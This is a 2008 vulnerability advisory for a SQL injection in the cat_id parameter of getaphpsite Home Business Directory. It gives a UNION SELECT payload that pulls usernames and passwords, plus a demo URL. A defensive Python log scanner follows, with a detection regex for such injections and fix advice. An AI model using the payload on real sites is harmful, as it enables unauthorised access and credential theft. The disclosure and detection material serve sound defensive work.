getaphpsite Home Business Directory suffers from a remote SQL injection vulnerability in directory.php.
[~] getaphpsite Home Business Directory (cat_id) Remote Sql inj
[~]
[~] script: http://www.getaphpsite.com/17.html
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~] -----------------------------------------------------------
Exploit:
http://z0rlu.blogspot.com/script/directory.php?ax=list&sub=ZoRLu&cat_id=[SQL]
[SQL]=
0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users
for demo:
http://www.getaphpsite.com/demos/homebiz/directory.php?ax=list&sub=ZoRLu&cat_id=0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
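
Added example (not part of the original advisory and not the vendor's code): a Python log scanner that flags requests to directory.php whose cat_id is not a plain integer, and marks those carrying a UNION SELECT like the string shown above. It assumes cat_id is meant to be a numeric category id and that the server writes combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "union select" with whitespace or /**/ comments between the keywords.
GAP = r"(?:\s|/\*.*?\*/)+"
UNION_SELECT_RE = re.compile(rf"union{GAP}(?:all{GAP})?select", re.I | re.S)

def classify_cat_id(value):
    """Classify one decoded cat_id value: 'ok', 'union_select' or 'non_numeric'."""
    if re.fullmatch(r"[0-9]{1,10}", value):  # assumption: cat_id is a numeric id
        return "ok"
    # Second decode pass catches double-encoded input such as %2520.
    if UNION_SELECT_RE.search(unquote_plus(value)):
        return "union_select"
    return "non_numeric"

def scan_line(line):
    """Return (path, cat_id, verdict) for a suspicious directory.php request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/directory.php"):
        return None
    # parse_qs URL-decodes each value, turning '+' into a space.
    for value in parse_qs(url.query, keep_blank_values=True).get("cat_id", []):
        verdict = classify_cat_id(value)
        if verdict != "ok":
            return (url.path, value, verdict)
    return None

def scan(lines):
    """Return the findings for every flagged line, in order."""
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample log lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Dec/2008:10:00:00 +0000] "GET /demos/homebiz/directory.php?ax=list&cat_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Dec/2008:10:01:00 +0000] "GET /demos/homebiz/directory.php?ax=list&sub=x&cat_id=0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users HTTP/1.1" 200 7301',
    '203.0.113.9 - - [31/Dec/2008:10:02:00 +0000] "GET /demos/homebiz/directory.php?ax=list&cat_id=7%27 HTTP/1.1" 200 812',
    '203.0.113.7 - - [31/Dec/2008:10:03:00 +0000] "GET /demos/homebiz/index.php?cat_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for path, value, verdict in scan(SAMPLE_LOG):
        print(f"{verdict}: {path} cat_id={value!r}")
```

The same integer-only rule used in classify_cat_id is the fix on the application side: reject or cast cat_id before it reaches the query, and bind it as a parameter.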